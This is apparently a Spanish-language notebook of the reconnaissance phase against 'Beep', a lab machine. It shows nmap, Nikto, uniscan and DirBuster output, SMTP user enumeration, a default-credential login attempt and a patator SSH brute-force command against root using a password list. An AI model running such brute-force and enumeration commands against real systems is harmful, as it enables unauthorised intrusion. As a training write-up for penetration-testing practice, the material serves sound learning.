		Beep 10.10.10.7

+++++ INFORMACION ENTREGADA ++++++++++++++++++++++++++++++++++++++
	Nombre: Beep
	Sistema Operativo:
	Dificultad: Facil
	IP: 10.10.10.7


-- PUERTOS:

nmap -sC -sV -A -O -p22,25,80,110,111,143,443,878,993,995,3306,4190,4445,4559,5038,10000 10.10.10.7

	PORT      STATE SERVICE    VERSION
	11/tcp    closed systat
	22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
	| ssh-hostkey: 
	|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
	|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
	25/tcp    open  smtp       Postfix smtpd
	|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
	80/tcp    open  http       Apache httpd 2.2.3
	| http-methods: 
	|_  Supported Methods: GET HEAD POST OPTIONS
	|_http-server-header: Apache/2.2.3 (CentOS)
	|_http-title: Did not follow redirect to https://10.10.10.7/
	|_https-redirect: ERROR: Script execution failed (use -d to debug)
	110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
	|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) STLS LOGIN-DELAY(0) TOP PIPELINING APOP AUTH-RESP-CODE USER EXPIRE(NEVER) UIDL RESP-CODES
	111/tcp   open  rpcbind    2 (RPC #100000)
	143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
	|_imap-capabilities: Completed IMAP4rev1 OK ANNOTATEMORE NO IMAP4 LISTEXT SORT=MODSEQ ATOMIC LIST-SUBSCRIBED X-NETSCAPE UNSELECT IDLE SORT URLAUTHA0001 RENAME CATENATE RIGHTS=kxte MULTIAPPEND UIDPLUS THREAD=ORDEREDSUBJECT CONDSTORE QUOTA LITERAL+ STARTTLS ACL BINARY ID MAILBOX-REFERRALS NAMESPACE THREAD=REFERENCES CHILDREN
	443/tcp   open  ssl/https?
	|_ssl-date: 2020-03-07T13:01:28+00:00; +59m59s from scanner time.
	879/tcp   open  status     1 (RPC #100024)
	993/tcp   open  ssl/imap   Cyrus imapd
	|_imap-capabilities: CAPABILITY
	995/tcp   open  pop3       Cyrus pop3d
	3306/tcp  open  mysql      MySQL (unauthorized)
	4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
	4445/tcp  open  upnotifyp?
	4559/tcp  open  hylafax    HylaFAX 4.3.10
	5038/tcp  open  asterisk   Asterisk Call Manager 1.1
	10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
	|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
	| http-methods: 
	|_  Supported Methods: GET HEAD POST OPTIONS
	|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

	Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
	Device type: general purpose|media device|PBX|WAP|specialized|printer|proxy server
	Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), Riverbed RiOS (94%), HP embedded (94%), Netgear embedded (94%), Osmosys embedded (93%)
	OS CPE: cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/o:riverbed:rios cpe:/h:netgear:eva9100 cpe:/o:linux:linux_kernel:2.6
	Aggressive OS guesses: Linux 2.6.18 (95%), Linux 2.6.27 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.30 (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%), Linux 2.6.9-22.0.1.EL (CentOS 4.4) (95%), Linux 2.6.18 - 2.6.32 (95%)
	No exact OS matches for host (test conditions non-ideal).
	Network Distance: 2 hops
	Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

	Host script results:
	|_clock-skew: 59m58s

nmap -sU -sC -sV -p111,123 10.10.10.7
	PORT    STATE SERVICE VERSION
	111/udp open  rpcbind 2 (RPC #100000)
	123/udp open  ntp     NTP v4 (secondary server)
	| ntp-info: 
	|_  

	Host script results:
	|_clock-skew: 1h00m13s

----- RESUMEN DE LA INFORMACION OBTENIDA ---------------------------

	PORT 	PROTOCOLO	SERVICIO	VERSION 
	22	TCP	 	ssh		OpenSSH 4.3 (protocol 2.0)
	25	TCP		smtp		Postfix smtpd
	80	TCP		http		Apache httpd 2.2.3
	110	TCP		pop3		Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
	111	TCP		rpcbind		2 (RPC #100000)
	143	TCP		imap		Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
	443	TCP		ssl/https?
	879	TCP		status		1 (RPC #100024)
	993	TCP		imaps		Cyrus imapd
	995	TCP		pop3s		Cyrus pop3d
	3306	TCP		mysql		MySQL (unauthorized)
	4190	TCP		sieve		Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
	4445	TCP		upnotifyp?
	4559	TCP		hylafax		HylaFAX 4.3.10
	5038	TCP		asterisk	Asterisk Call Manager 1.1
	10000	TCP		snet-sensor-mgmt     MiniServ 1.570 (Webmin httpd)

	111	UDP		rpcbind		 2 (RPC #100000)
	123	UDP		ntp		NTP v4 (secondary server)

+++++ FASE DE ANALISIS DE VULNERABILIDADES +++++++++++++++++++++

----- SSH: Conexion por el puerto 22 y version OpenSSH 4.3 (protocol 2.0) ---------------------

-- Prueba con acceso de usuario y password por defecto:

	ssh 10.10.10.7
	No tiene password por defecto.


-- Herramienta NMAP con script:

nmap --script=*ssh*.nse -p22 10.10.10.7

	22/tcp open  ssh
	| ssh-auth-methods: 
	|   Supported authentication methods: 
	|     publickey
	|     gssapi-with-mic
	|_    password
	| ssh-brute: 
	|	  Accounts: No valid accounts found
	|_  Statistics: Performed 270 guesses in 601 seconds, average tps: 0.4
	| ssh-hostkey: 
	|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
	|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
	| ssh-publickey-acceptance: 
	|_  Accepted Public Keys: No public keys accepted
	|_ssh-run: Failed to specify credentials and command to run.
	| ssh2-enum-algos: 
	|   kex_algorithms: (3)
	|       diffie-hellman-group-exchange-sha1
	|       diffie-hellman-group14-sha1
	|       diffie-hellman-group1-sha1
	|   server_host_key_algorithms: (2)
	|       ssh-rsa
	|       ssh-dss
	|   encryption_algorithms: (13)
	|       aes128-ctr
	|       aes192-ctr
	|       aes256-ctr
	|       arcfour256
	|       arcfour128
	|       aes128-cbc
	|       3des-cbc
	|       blowfish-cbc
	|       cast128-cbc
	|       aes192-cbc
	|       aes256-cbc
	|       arcfour
	|       rijndael-cbc@lysator.liu.se
	|   mac_algorithms: (6)
	|       hmac-md5
	|       hmac-sha1
	|       hmac-ripemd160
	|       hmac-ripemd160@openssh.com
	|       hmac-sha1-96
	|       hmac-md5-96
	|   compression_algorithms: (2)
	|       none
	|_      zlib@openssh.com


-- Herramienta netcat para confirmar Banner:

root@kali:~/Desktop# nc -vn 10.10.10.7 22
(UNKNOWN) [10.10.10.7] 22 (ssh) open

- Herramienta Metasploit:

	msf > use auxiliary/scanner/ssh/ssh_version
	[+] 10.10.10.7:22         - SSH server version: SSH-2.0-OpenSSH_4.3 ( service.version=4.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:4.3 service.protocol=ssh fingerprint_db=ssh.banner )
	[*] 10.10.10.7:22         - Scanned 1 of 1 hosts (100% complete)

- Herramienta searchsploit.
	searchsploit openssh 4.3
	----------------------------------------------------------------------------- ----------------------------------------
	 Exploit Title                                                               |  Path
																				 | (/usr/share/exploitdb/)
	----------------------------------------------------------------------------- ----------------------------------------
	OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service                   | exploits/multiple/dos/2444.sh
	----------------------------------------------------------------------------- ----------------------------------------
	(No se consigue nada).
	
-- Herramienta Papator, para realziar fuerza bruta.
	python3 /usr/bin/patator ssh_login host=10.10.10.7 user=root password=FILE0 0=/root/Desktop/Diccionarios/rockyou.txt -x ignore:mesg='Authentication failed.'
						
						
						
----- SMTP: Por el puerto 25 y version Postfix smtpd ------------------------------------

-- Herramienta NMAP con script:

	nmap --script=*smtp*.nse -p25 10.10.10.7

		25/tcp open  smtp                                                                                                           
		|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,                
		| smtp-enum-users:                                                                                                           
		|_  Method RCPT returned a unhandled status code.                                                                            
		|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed                                                 
		| smtp-vuln-cve2010-4344:                                                                                                    
		|_  The SMTP server is not Exim: NOT VULNERABLE

-- Con la aplicacion telnet

	telnet 10.10.10.7 25
	
		Trying 10.10.10.7...
		Connected to 10.10.10.7.
		Escape character is '^]'.
		220 beep.localdomain ESMTP Postfix
		EHLO inhacksa9.beep.htb
		250-beep.localdomain
		250-PIPELINING
		250-SIZE 10240000
		250-VRFY
		250-ETRN
		250-ENHANCEDSTATUSCODES
		250-8BITMIME
		250 DSN
		VRFY asterisk@localhost
		252 2.0.0 asterisk@localhost


-- Con la herramienta ISMTP:

	El programa se descarga desde la web: https://github.com/crunchsec/ismtp/blob/master/ismtp.py
	
	./ismtp.py -h 10.10.10.7 -l 1 -e /usr/share/metasploit-framework/data/wordlists/unix_users.txt
	---------------------------------------------------------------------
	iSMTP v1.6 - SMTP Server Tester, Alton Johnson (alton.jx@gmail.com)
	---------------------------------------------------------------------
 	Testing SMTP server [user enumeration]: 10.10.10.7:25
	Emails provided for testing: 112
	Error: The system timed out while trying to connect to the SMTP server.
	Completed SMTP user enumeration test.
	-----
	Completed in: 10.1s
	(No se consigue nada)

-- Netcat:

	nc 10.10.10.7 25
	220 beep.localdomain ESMTP Postfix

-- Con la aplicacion Metasploit:

	msf5 > use auxiliary/scanner/smtp/smtp_enum
		[*] 10.10.10.7:25         - 10.10.10.7:25 Banner: 220 beep.localdomain ESMTP Postfix
		[+] 10.10.10.7:25         - 10.10.10.7:25 Users found: , adm, bin, daemon, fax, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, news, nobody, operator, postgres, postmaster, sshd, sync, uucp, webmaster, www
		[*] 10.10.10.7:25         - Scanned 1 of 1 hosts (100% complete)
		[*] Auxiliary module execution completed

	msf5 > use auxiliar/scanner/smtp/smtp_version
		[+] 10.10.10.7:25         - 10.10.10.7:25 SMTP 220 beep.localdomain ESMTP Postfix\x0d\x0a
		[*] 10.10.10.7:25         - Scanned 1 of 1 hosts (100% complete)
		[*] Auxiliary module execution completed

	msf5 >use auxiliary/scanner/smtp/smtp_ntlm_domain
		[*] 10.10.10.7:25         - Scanned 1 of 1 hosts (100% complete)
		[*] Auxiliary module execution completed

	msf5 >use auxiliary/scanner/smtp/smtp_version
		[+] 10.10.10.7:25         - 10.10.10.7:25 SMTP 220 beep.localdomain ESMTP Postfix\x0d\x0a
		[*] 10.10.10.7:25         - Scanned 1 of 1 hosts (100% complete)
		[*] Auxiliary module execution completed

	msf5 > use auxiliary/scanner/smtp/smtp_relay
		[+] 10.10.10.7:25         - SMTP 220 beep.localdomain ESMTP Postfix\x0d\x0a
		[*] 10.10.10.7:25         - No relay detected
		[*] 10.10.10.7:25         - Scanned 1 of 1 hosts (100% complete)

	msf5 > use auxiliary/fuzzers/smtp/smtp_fuzzer
	(No muestra ningun dato)
	
	
	
----- http: Por el puerto 80, version apache httpd 2.2.3 ---------------------------

Al poner la IP en el navegador detecta:
	Server apache 2.2.3, 
	Programado en PHP 5.1.6
	Sistema operativo Centos.

	Es un acceso de elastix. Probar con las claves por defecto:
	Username: admin   Password: palosanto   No se accede.

nmap -v --script=*http* 10.10.10.7 -p80
	PORT   STATE SERVICE
	80/tcp open  http
	| http-brute:   
	|_  Path "/" does not require authentication
	|_http-chrono: Request times for /; avg: 158.08ms; min: 154.97ms; max: 159.74ms
	|_http-comments-displayer: Couldn't find any comments.
	|_http-csrf: Couldn't find any CSRF vulnerabilities.
	|_http-date: Sat, 18 Apr 2020 18:03:02 GMT; -1s from local time.
	|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
	|_http-dombased-xss: Couldn't find any DOM based XSS.
	|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
	| http-enum: 
	|_  /icons/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
	|_http-errors: Couldn't find any error pages.
	|_http-feed: Couldn't find any feeds.
	|_http-fetch: Please enter the complete path of the directory to save data in.
	| http-grep: 
	|   (1) https://10.10.10.7:443/: 
	|     (1) ip: 
	|_      + 10.10.10.7
	| http-headers: 
	|   Date: Sat, 18 Apr 2020 18:03:03 GMT
	|   Server: Apache/2.2.3 (CentOS)
	|   Location: https://10.10.10.7/
	|   Content-Length: 278
	|   Connection: close
	|   Content-Type: text/html; charset=iso-8859-1
	|   
	|_  (Request type: GET)
	|_http-jsonp-detection: Couldn't find any JSONP endpoints.
	| http-methods: 
	|_  Supported Methods: GET HEAD POST OPTIONS
	|_http-mobileversion-checker: No mobile version detected.
	|_http-passwd: ERROR: Script execution failed (use -d to debug)
	|_http-referer-checker: Couldn't find any cross-domain scripts.
	|_http-security-headers: 
	|_http-server-header: Apache/2.2.3 (CentOS)
	| http-sitemap-generator: 
	|   Directory structure:
	|   Longest directory structure:
	|     Depth: 0
	|     Dir: /
	|   Total files found (by extension):
	|_    
	|_http-slowloris: false
	| http-slowloris-check: 
	|   VULNERABLE:
	|   Slowloris DOS attack
	|     State: LIKELY VULNERABLE
	|     IDs:  CVE:CVE-2007-6750
	|       Slowloris tries to keep many connections to the target web server open and hold
	|       them open as long as possible.  It accomplishes this by opening connections to
	|       the target web server and sending a partial request. By doing so, it starves
	|       the http server's resources causing Denial Of Service.
	|       
	|     Disclosure date: 2009-09-17
	|     References:
	|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
	|_      http://ha.ckers.org/slowloris/
	|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
	|_http-title: Did not follow redirect to https://10.10.10.7/
	| http-trace: TRACE is enabled
	| Headers:
	| Date: Sat, 18 Apr 2020 17:32:53 GMT
	| Server: Apache/2.2.3 (CentOS)
	| Connection: close
	| Transfer-Encoding: chunked
	|_Content-Type: message/http
	| http-useragent-tester: 
	|   Status for browser useragent: false
	|   Redirected To: https://10.10.10.7/
	|   Allowed User Agents: 
	|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
	|     libwww
	|     lwp-trivial
	|     libcurl-agent/1.0
	|     PHP/
	|     Python-urllib/2.5
	|     GT::WWW
	|     Snoopy
	|     MFC_Tear_Sample
	|     HTTP::Lite
	|     PHPCrawl
	|     URI::Fetch
	|     Zend_Http_Client
	|     http client
	|     PECL::HTTP
	|     Wget/1.13.4 (linux-gnu)
	|_    WWW-Mechanize/1.34
	| http-vhosts: 
	|_127 names had status 302
	|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
	|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
	|_http-xssed: No previously reported XSS vuln.
	|_https-redirect: ERROR: Script execution failed (use -d to debug)

nmap -v --script=*http* 10.10.10.7 -p443

	PORT    STATE SERVICE
	443/tcp open  https
	|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
	| http-brute:   
	|_  Path "/" does not require authentication
	|_http-chrono: Request times for /; avg: 8160.21ms; min: 8153.30ms; max: 8168.69ms
	|_http-comments-displayer: Couldn't find any comments.
	|_http-csrf: Couldn't find any CSRF vulnerabilities.
	|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
	|_http-dombased-xss: Couldn't find any DOM based XSS.
	|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
	|_http-errors: ERROR: Script execution failed (use -d to debug)
	|_http-feed: Couldn't find any feeds.
	|_http-fetch: Please enter the complete path of the directory to save data in.
	|_http-jsonp-detection: Couldn't find any JSONP endpoints.
	|_http-malware-host: Host appears to be clean
	|_http-mobileversion-checker: No mobile version detected.
	|_http-referer-checker: Couldn't find any cross-domain scripts.
	| http-security-headers: 
	|   Strict_Transport_Security: 
	|_    HSTS not configured in HTTPS Server
	| http-sitemap-generator: 
	|   Directory structure:
	|   Longest directory structure:
	|     Depth: 0
	|     Dir: /
	|   Total files found (by extension):
	|_    
	|_http-slowloris: false
	|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
	| http-useragent-tester: 
	|   Allowed User Agents: 
	|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
	|     libwww
	|     lwp-trivial
	|     libcurl-agent/1.0
	|     PHP/
	|     Python-urllib/2.5
	|     GT::WWW
	|     Snoopy
	|     MFC_Tear_Sample
	|     HTTP::Lite
	|     PHPCrawl
	|     URI::Fetch
	|     Zend_Http_Client
	|     http client
	|     PECL::HTTP
	|     Wget/1.13.4 (linux-gnu)
	|_    WWW-Mechanize/1.34
	| http-vhosts: 
	|_127 names had status ERROR
	|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
	|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
	|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
	|_http-xssed: No previously reported XSS vuln.

-- Con la aplicacion NIKTO:

	nikto -h 10.10.10.7 -p 80 
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          10.10.10.7
	+ Target Hostname:    10.10.10.7
	+ Target Port:        80
	+ Start Time:         2020-04-18 12:04:18 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache/2.2.3 (CentOS)
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ Root page / redirects to: https://10.10.10.7/
	+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
	+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
	+ OSVDB-3268: /icons/: Directory indexing found.
	+ Server may leak inodes via ETags, header found with file /icons/README, inode: 884871, size: 4872, mtime: Thu Jun 24 15:46:08 2010
	+ OSVDB-3233: /icons/README: Apache default file found.
	+ 8672 requests: 0 error(s) and 8 item(s) reported on remote host
	+ End Time:           2020-04-18 12:17:13 (GMT-4) (775 seconds)

	nikto -h 10.10.10.7 -p 10000
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          10.10.10.7
	+ Target Hostname:    10.10.10.7
	+ Target Port:        10000
	+ Start Time:         2020-04-29 09:11:04 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: MiniServ/1.570
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ MiniServ - This is the Webmin Unix administrator. It should not be running unless required.
	+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
	+ 7870 requests: 0 error(s) and 5 item(s) reported on remote host
	+ End Time:           2020-04-29 09:26:40 (GMT-4) (936 seconds)
	---------------------------------------------------------------------------

-- Con la aplicacion uniscan:
	uniscan -u 10.10.10.7 -qweds

	####################################
	# Uniscan project                  #
	# http://uniscan.sourceforge.net/  #
	####################################
	V. 6.3


	Scan date: 18-4-2020 12:33:20
	===================================================================================================
	| Domain: http://10.10.10.7/
	| IP: 10.10.10.7
	===================================================================================================
	|
	| Directory check:
	| Skipped because http://10.10.10.7/uniscan403/ did not return the code 404
	===================================================================================================
	|                                                                                                   
	| File check:
	| Skipped because http://10.10.10.7/uniscan546/ did not return the code 404
	===================================================================================================
	|
	| Check robots.txt:
	|
	| Check sitemap.xml:
	===================================================================================================
	|
	| Crawler Started:
	| Plugin name: External Host Detect v.1.2 Loaded.
	| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
	| Plugin name: Upload Form Detect v.1.1 Loaded.
	| Plugin name: E-mail Detection v.1.1 Loaded.
	| Plugin name: phpinfo() Disclosure v.1 Loaded.
	| Plugin name: Code Disclosure v.1.1 Loaded.
	| Plugin name: FCKeditor upload test v.1 Loaded.
	| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
	| [+] Crawling finished, 1 URL's found!
	|
	| External hosts:
	|
	| Timthumb:
	|
	| File Upload Forms:
	|
	| E-mails:
	|
	| PHPinfo() Disclosure:
	|
	| Source Code Disclosure:
	|
	| FCKeditor File Upload:
	|
	| Web Backdoors:
	|
	| Ignored Files: 
	===================================================================================================
	| Dynamic tests:
	| Plugin name: Learning New Directories v.1.2 Loaded.
	| Plugin name: FCKedior tests v.1.1 Loaded.
	| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
	| Plugin name: Find Backup Files v.1.2 Loaded.
	| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
	| Plugin name: Local File Include tests v.1.1 Loaded.
	| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
	| Plugin name: Remote Command Execution tests v.1.1 Loaded.
	| Plugin name: Remote File Include tests v.1.2 Loaded.
	| Plugin name: SQL-injection tests v.1.2 Loaded.
	| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
	| Plugin name: Web Shell Finder v.1.3 Loaded.
	| [+] 0 New directories added
	|                                                                                                   
	|                                                                                                   
	| FCKeditor tests:
	| Skipped because http://10.10.10.7/testing123 did not return the code 404
	|                                                                                                   
	|                                                                                                   
	| Timthumb < 1.33 vulnerability:
	|                                                                                                   
	|                                                                                                   
	| Backup Files:
	| Skipped because http://10.10.10.7/testing123 did not return the code 404
	|                                                                                                   
	|                                                                                                   
	| Blind SQL Injection:
	|                                                                                                   
	|                                                                                                   
	| Local File Include:
	|                                                                                                   
	|                                                                                                   
	| PHP CGI Argument Injection:
	|                                                                                                   
	|                                                                                                   
	| Remote Command Execution:
	|                                                                                                   
	|                                                                                                   
	| Remote File Include:
	|                                                                                                   
	|                                                                                                   
	| SQL Injection:
	|                                                                                                   
	|                                                                                                   
	| Cross-Site Scripting (XSS):
	|                                                                                                   
	|                                                                                                   
	| Web Shell Finder:
	===================================================================================================
	| Static tests:
	| Plugin name: Local File Include tests v.1.1 Loaded.
	| Plugin name: Remote Command Execution tests v.1.1 Loaded.
	| Plugin name: Remote File Include tests v.1.1 Loaded.
	|                                                                                                   
	|                                                                                                   
	| Local File Include:
	|                                                                                                   
	|                                                                                                   
	| Remote Command Execution:
	|                                                                                                   
	|                                                                                                   
	| Remote File Include:
	===================================================================================================
	Scan end date: 18-4-2020 12:35:51
	HTML report saved in: report/10.10.10.7.html

-- Con la aplicacion Disrbuster:

	https://10.10.10.7:443
	--------------------------------
	Directories found during testing:

	/index.php
	/register.php
	/help/frameLeft.php
	/help/frameRight.php
	/themes/elastixneo/applet.css
	/themes/elastixneo/content.css
	/themes/elastixneo/header.css
	/themes/elastixneo/help.css
	/themes/elastixneo/ie.css
	/themes/elastixneo/login_styles.css
	/themes/elastixneo/styles.css
	/themes/elastixneo/table.css
	/themes/elastixneo/_common/_alert_container_confirmation.tpl
	/themes/al/help.css
	/themes/elastixneo/_common/_alert_container_error.tpl
	/themes/default/help.css
	/themes/elastixneo/_common/_alert_container_information.tpl
	/themes/elastixeasy-Blue/help.css
	/themes/al/styles.css
	/themes/elastixblue/help.css
	/themes/elastixneo/_common/_list.tpl
	/themes/elastixeasy-Black/help.css
	/themes/elastixeasy-Red/help.css
	/themes/default/styles.css
	/themes/elastixeasy-Blue/styles.css
	/themes/elastixneo/_common/_menu.tpl
	/themes/elastixeasy-Orange/help.css
	/themes/elastixblue/styles.css
	/themes/elastixneo/_common/help.tpl
	/themes/elastixeasy-Violet/help.css
	/themes/elastixeasy-Black/styles.css
	/themes/elastixneo/_common/index.tpl
	/themes/elastixeasy-Red/styles.css
	/themes/elastixeasy-Orange/styles.css
	/themes/elastixwave/help.css
	/themes/elastixeasy-Violet/styles.css
	/themes/elastixneo/_common/listcsv.tpl
	/themes/elastixwave/styles.css
	/themes/elastixneo/_common/login.tpl
	/themes/elastixneo/_common/popup.tpl
	/themes/elastixwine/help.css
	/themes/giox/help.css
	/themes/al/_common/_alert_container_confirmation.tpl
	/themes/default/_common/_alert_container_confirmation.tpl
	/themes/giox/styles.css
	/themes/slashdot/help.css
	/themes/elastixblue/_common/_alert_container_confirmation.tpl
	/themes/al/_common/_alert_container_error.tpl
	/themes/default/_common/_alert_container_error.tpl
	/themes/elastixeasy-Blue/_common/_alert_container_confirmation.tpl
	/themes/elastixwine/styles.css
	/themes/al/_common/_alert_container_information.tpl
	/themes/elastixblue/_common/_alert_container_error.tpl
	/themes/slashdot/styles.css
	/themes/default/_common/_alert_container_information.tpl
	/themes/al/_common/_list.tpl
	/themes/elastixeasy-Blue/_common/_alert_container_error.tpl
	/themes/elastixblue/_common/_alert_container_information.tpl
	/themes/default/_common/_list.tpl
	/themes/al/_common/_menu.tpl
	/themes/elastixeasy-Blue/_common/_alert_container_information.tpl
	/themes/elastixblue/_common/_list.tpl
	/themes/default/_common/_menu.tpl
	/themes/al/_common/help.tpl
	/themes/elastixeasy-Blue/_common/_list.tpl
	/themes/elastixeasy-Blue/_common/_menu.tpl
	/themes/elastixeasy-Black/_common/_alert_container_confirmation.tpl
	/themes/al/_common/index.tpl
	/themes/default/_common/help.tpl
	/themes/elastixblue/_common/_menu.tpl
	/themes/elastixeasy-Blue/_common/help.tpl
	/themes/elastixeasy-Black/_common/_alert_container_error.tpl
	/themes/al/_common/listcsv.tpl
	/themes/default/_common/index.tpl
	/themes/elastixblue/_common/help.tpl
	/themes/elastixeasy-Blue/_common/index.tpl
	/themes/elastixeasy-Black/_common/_alert_container_information.tpl
	/themes/al/_common/login.tpl
	/themes/default/_common/listcsv.tpl
	/themes/elastixblue/_common/index.tpl
	/themes/elastixeasy-Blue/_common/listcsv.tpl
	/themes/elastixeasy-Black/_common/_list.tpl
	/themes/al/_common/popup.tpl
	/themes/elastixeasy-Orange/_common/_alert_container_confirmation.tpl
	/themes/elastixeasy-Black/_common/_menu.tpl
	/themes/elastixeasy-Blue/_common/login.tpl
	/themes/elastixblue/_common/listcsv.tpl
	/themes/default/_common/login.tpl
	/themes/elastixeasy-Orange/_common/_alert_container_error.tpl
	/themes/elastixeasy-Black/_common/help.tpl
	/themes/elastixeasy-Blue/_common/popup.tpl
	/themes/elastixblue/_common/login.tpl
	/themes/default/_common/popup.tpl
	/themes/elastixeasy-Orange/_common/_alert_container_information.tpl
	/themes/elastixeasy-Black/_common/index.tpl
	/themes/elastixblue/_common/popup.tpl
	/themes/elastixeasy-Orange/_common/_list.tpl
	/themes/elastixeasy-Black/_common/listcsv.tpl
	/themes/elastixeasy-Orange/_common/_menu.tpl
	/themes/elastixeasy-Black/_common/login.tpl
	/themes/elastixeasy-Orange/_common/help.tpl
	/themes/elastixeasy-Black/_common/popup.tpl
	/themes/elastixeasy-Orange/_common/index.tpl
	/themes/elastixeasy-Orange/_common/listcsv.tpl
	/themes/elastixeasy-Orange/_common/login.tpl
	/themes/elastixeasy-Orange/_common/popup.tpl
	/themes/elastixeasy-Red/_common/_alert_container_confirmation.tpl
	/themes/elastixeasy-Red/_common/_alert_container_error.tpl
	/themes/elastixeasy-Red/_common/_alert_container_information.tpl
	/themes/elastixeasy-Violet/_common/_alert_container_confirmation.tpl
	/themes/elastixeasy-Red/_common/_list.tpl
	/themes/elastixeasy-Violet/_common/_alert_container_error.tpl
	/themes/elastixeasy-Red/_common/_menu.tpl
	/themes/elastixeasy-Violet/_common/_alert_container_information.tpl
	/themes/elastixeasy-Red/_common/help.tpl
	/themes/elastixeasy-Violet/_common/_list.tpl
	/themes/elastixeasy-Violet/_common/_menu.tpl
	/themes/elastixeasy-Red/_common/index.tpl
	/themes/elastixeasy-Violet/_common/help.tpl
	/themes/elastixeasy-Red/_common/listcsv.tpl
	/themes/elastixeasy-Violet/_common/index.tpl
	/themes/elastixeasy-Red/_common/login.tpl
	/themes/elastixeasy-Violet/_common/listcsv.tpl
	/themes/elastixeasy-Red/_common/popup.tpl
	/themes/elastixeasy-Violet/_common/login.tpl
	/themes/elastixeasy-Violet/_common/popup.tpl
	/themes/elastixwave/_common/_alert_container_confirmation.tpl
	/themes/elastixwave/_common/_alert_container_error.tpl
	/themes/elastixwave/_common/_alert_container_information.tpl
	/themes/elastixwave/_common/_list.tpl
	/themes/elastixwave/_common/_menu.tpl
	/themes/elastixwave/_common/help.tpl
	/themes/elastixwave/_common/index.tpl
	/themes/elastixwave/_common/listcsv.tpl
	/themes/elastixwave/_common/login.tpl
	/themes/elastixwine/_common/_alert_container_confirmation.tpl
	/themes/elastixwave/_common/popup.tpl
	/themes/elastixwine/_common/_alert_container_error.tpl
